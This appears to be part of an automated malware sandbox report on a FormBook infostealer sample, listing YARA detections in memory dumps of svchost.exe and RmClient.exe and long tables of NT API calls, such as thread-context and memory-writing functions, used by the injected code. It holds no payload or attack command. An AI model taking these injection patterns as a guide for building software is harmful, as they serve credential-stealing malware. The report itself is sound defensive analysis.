            Source: RmClient.exe, 00000006.00000002.4132858063.0000000005E40000.00000004.00000800.00020000.00000000.sdmp, RmClient.exe, 00000006.00000002.4131092895.0000000004E6E000.00000004.10000000.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130492087.000000000443E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2660000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2660000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4129418415.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4129085858.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4130342799.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4130314463.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1964459528.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268C433 NtClose,1_2_0268C433
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk,1_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B60 NtClose,LdrInitializeThunk,1_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074340 NtSetContextThread,1_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073010 NtOpenDirectoryObject,1_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073090 NtSetValueKey,1_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03074650 NtSuspendThread,1_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072B80 NtQueryInformationFile,1_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BA0 NtEnumerateValueKey,1_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BE0 NtQueryValueKey,1_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072BF0 NtAllocateVirtualMemory,1_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AB0 NtWaitForSingleObject,1_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AD0 NtReadFile,1_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072AF0 NtWriteFile,1_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030739B0 NtGetContextThread,1_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F30 NtCreateSection,1_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F60 NtCreateProcessEx,1_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072F90 NtProtectVirtualMemory,1_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FA0 NtQuerySection,1_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FB0 NtResumeThread,1_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072FE0 NtCreateFile,1_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E30 NtWriteVirtualMemory,1_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072E80 NtReadVirtualMemory,1_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EA0 NtAdjustPrivilegesToken,1_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072EE0 NtQueueApcThread,1_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D00 NtSetInformationFile,1_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D10 NtMapViewOfSection,1_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D10 NtOpenProcessToken,1_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072D30 NtUnmapViewOfSection,1_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03073D70 NtOpenThread,1_2_03073D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DB0 NtEnumerateKey,1_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072DD0 NtDelayExecution,1_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C00 NtQueryInformationProcess,1_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072C60 NtCreateKey,1_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CA0 NtQueryInformationToken,1_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CC0 NtQueryVirtualMemory,1_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072CF0 NtOpenProcess,1_2_03072CF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03064340 NtSetContextThread,LdrInitializeThunk,6_2_03064340
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03064650 NtSuspendThread,LdrInitializeThunk,6_2_03064650
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030635C0 NtCreateMutant,LdrInitializeThunk,6_2_030635C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062B60 NtClose,LdrInitializeThunk,6_2_03062B60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03062BA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03062BE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03062BF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062AD0 NtReadFile,LdrInitializeThunk,6_2_03062AD0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062AF0 NtWriteFile,LdrInitializeThunk,6_2_03062AF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030639B0 NtGetContextThread,LdrInitializeThunk,6_2_030639B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062F30 NtCreateSection,LdrInitializeThunk,6_2_03062F30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062FB0 NtResumeThread,LdrInitializeThunk,6_2_03062FB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062FE0 NtCreateFile,LdrInitializeThunk,6_2_03062FE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03062E80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03062EE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03062D10
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03062D30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062DD0 NtDelayExecution,LdrInitializeThunk,6_2_03062DD0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03062DF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062C60 NtCreateKey,LdrInitializeThunk,6_2_03062C60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03062C70
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03062CA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03063010 NtOpenDirectoryObject,6_2_03063010
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03063090 NtSetValueKey,6_2_03063090
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062B80 NtQueryInformationFile,6_2_03062B80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062AB0 NtWaitForSingleObject,6_2_03062AB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062F60 NtCreateProcessEx,6_2_03062F60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062F90 NtProtectVirtualMemory,6_2_03062F90
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062FA0 NtQuerySection,6_2_03062FA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062E30 NtWriteVirtualMemory,6_2_03062E30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062EA0 NtAdjustPrivilegesToken,6_2_03062EA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062D00 NtSetInformationFile,6_2_03062D00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03063D10 NtOpenProcessToken,6_2_03063D10
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03063D70 NtOpenThread,6_2_03063D70
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062DB0 NtEnumerateKey,6_2_03062DB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062C00 NtQueryInformationProcess,6_2_03062C00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062CC0 NtQueryVirtualMemory,6_2_03062CC0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03062CF0 NtOpenProcess,6_2_03062CF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00549080 NtClose,6_2_00549080
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_005491E0 NtAllocateVirtualMemory,6_2_005491E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00548D80 NtCreateFile,6_2_00548D80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00548EF0 NtReadFile,6_2_00548EF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00548FE0 NtDeleteFile,6_2_00548FE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1F0E9 NtQueryInformationProcess,6_2_00D1F0E9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_00D1FA38 NtSetContextThread,6_2_00D1FA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026783F31_2_026783F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026612201_2_02661220
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268EA231_2_0268EA23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026630F01_2_026630F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0266FE931_2_0266FE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0266DF131_2_0266DF13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0266FC731_2_0266FC73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0266256C1_2_0266256C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026625101_2_02662510
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026765CE1_2_026765CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026765D31_2_026765D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F132D1_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D34C1_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA3521_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308739A1_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F01_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031003E61_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E02741_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A01_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C01_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D2F01_2_0305D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030301001_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA1181_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307516C1_2_0307516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F1721_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310B16B1_2_0310B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304B1B01_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031001AA1_2_031001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F81CC1_2_030F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF0CC1_2_030EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C01_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F70E91_2_030F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF0E01_2_030FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030647501_2_03064750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030407701_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF7B01_2_030FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C01_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F16CC1_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C6E01_2_0305C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030405351_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F75711_2_030F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031005911_2_03100591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DD5B01_2_030DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FF43F1_2_030FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F24461_2_030F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030314601_2_03031460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EE4F61_2_030EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FAB401_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFB761_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FB801_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F6BD71_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307DBF91_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFA491_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7A461_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B3A6C1_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303EA801_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DDAAC1_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03085AA01_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EDAC61_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030499501_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B9501_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030569621_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A01_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310A9A61_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD8001_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030428401_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304A8401_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030268B81_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030438E01_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E8F01_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFF091_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03082F281_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060F301_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4F401_2_030B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041F921_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFFB11_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032FC81_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEE261_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040E591_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052E901_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FCE931_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03049EB01_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FEEDB1_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304AD001_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03043D401_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F1D5A1_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F7D731_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03058DBF1_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305FDC01_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303ADE01_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040C001_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B9C321_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0CB51_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030CF21_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FFCF21_2_030FFCF2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030E132D6_2_030E132D
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0301D34C6_2_0301D34C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EA3526_2_030EA352
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0307739A6_2_0307739A
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030F03E66_2_030F03E6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0303E3F06_2_0303E3F0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030D02746_2_030D0274
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030352A06_2_030352A0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0304B2C06_2_0304B2C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030D12ED6_2_030D12ED
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0304D2F06_2_0304D2F0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030201006_2_03020100
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030CA1186_2_030CA118
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030FB16B6_2_030FB16B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0306516C6_2_0306516C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0301F1726_2_0301F172
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030F01AA6_2_030F01AA
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0303B1B06_2_0303B1B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030E81CC6_2_030E81CC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030DF0CC6_2_030DF0CC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030370C06_2_030370C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030E70E96_2_030E70E9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EF0E06_2_030EF0E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030547506_2_03054750
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030307706_2_03030770
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EF7B06_2_030EF7B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0302C7C06_2_0302C7C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030E16CC6_2_030E16CC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0304C6E06_2_0304C6E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030305356_2_03030535
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030E75716_2_030E7571
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030F05916_2_030F0591
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030CD5B06_2_030CD5B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EF43F6_2_030EF43F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030E24466_2_030E2446
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030214606_2_03021460
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030DE4F66_2_030DE4F6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EAB406_2_030EAB40
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EFB766_2_030EFB76
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0304FB806_2_0304FB80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030E6BD76_2_030E6BD7
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0306DBF96_2_0306DBF9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EFA496_2_030EFA49
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030E7A466_2_030E7A46
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030A3A6C6_2_030A3A6C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0302EA806_2_0302EA80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030CDAAC6_2_030CDAAC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03075AA06_2_03075AA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030DDAC66_2_030DDAC6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030399506_2_03039950
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0304B9506_2_0304B950
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030469626_2_03046962
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030329A06_2_030329A0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030FA9A66_2_030FA9A6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030328406_2_03032840
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0303A8406_2_0303A840
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030168B86_2_030168B8
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030338E06_2_030338E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0305E8F06_2_0305E8F0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EFF096_2_030EFF09
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03050F306_2_03050F30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030A4F406_2_030A4F40
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03031F926_2_03031F92
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EFFB16_2_030EFFB1
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03022FC86_2_03022FC8
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EEE266_2_030EEE26
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03030E596_2_03030E59
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03042E906_2_03042E90
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030ECE936_2_030ECE93
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03039EB06_2_03039EB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030EEEDB6_2_030EEEDB
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0303AD006_2_0303AD00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03033D406_2_03033D40
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030E1D5A6_2_030E1D5A
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_030E7D736_2_030E7D73
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03048DBF6_2_03048DBF
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0304FDC06_2_0304FDC0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_0302ADE06_2_0302ADE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 6_2_03030C006_2_03030C00
